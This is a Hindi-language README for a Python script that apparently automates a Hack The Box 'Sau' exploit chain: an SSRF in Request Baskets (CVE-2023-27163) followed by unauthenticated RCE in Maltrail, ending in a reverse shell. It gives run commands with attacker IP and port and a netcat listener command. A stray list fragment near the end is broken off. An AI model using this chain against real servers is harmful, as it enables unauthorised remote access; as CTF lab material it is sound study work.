
HTB Sau के लिए स्वचालित एक्सप्लॉइट चेन — CVE-2023-27163 (SSRF) + Maltrail बिना प्रमाणीकरण वाला RCE → रिवर्स शेल
एक Python एक्सप्लॉइट स्क्रिप्ट जो CVE-2023-27163 (Request Baskets ≤ 1.2.1 में सर्वर-साइड रिक्वेस्ट फोर्जरी) को Maltrail 0.53 में बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता के साथ जोड़ती है, और रिवर्स शेल प्रदान करती है। Hack The Box Sau मशीन के लिए डिज़ाइन की गई।
यह स्क्रिप्ट लक्ष्य पर प्रारंभिक पहुंच प्राप्त करने के लिए आवश्यक एक्सप्लॉइटेशन पथ को स्वचालित करती है:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
उदाहरण:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
एक्सप्लॉइट चलाने से पहले, रिवर्स शेल को पकड़ने के लिए अपनी मशीन पर एक लिसनर शुरू करें:
nc -lvnp <LISTENER_PORT>
उदाहरण:
nc -lvnp 4444
| पैरामीटर | विवरण |
|---|---|
TARGET_URL | लक्ष्य का बेस URL (जैसे, http://IP) |
LISTENER_IP | आपकी हमलावर मशीन का IP |
LISTENER_PORT | रिवर्स शेल प्राप्त करने के लिए पोर्ट |
bucket_url) निकालें/ हटाएँ (स्क्रिप्ट में स्वचालित रूप से संभाला जाता है)यह परियोजना शैक्षिक उद्देश्यों और Hack The Box जैसे अधिकृत वातावरणों में उपयोग के लिए है। उचित अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।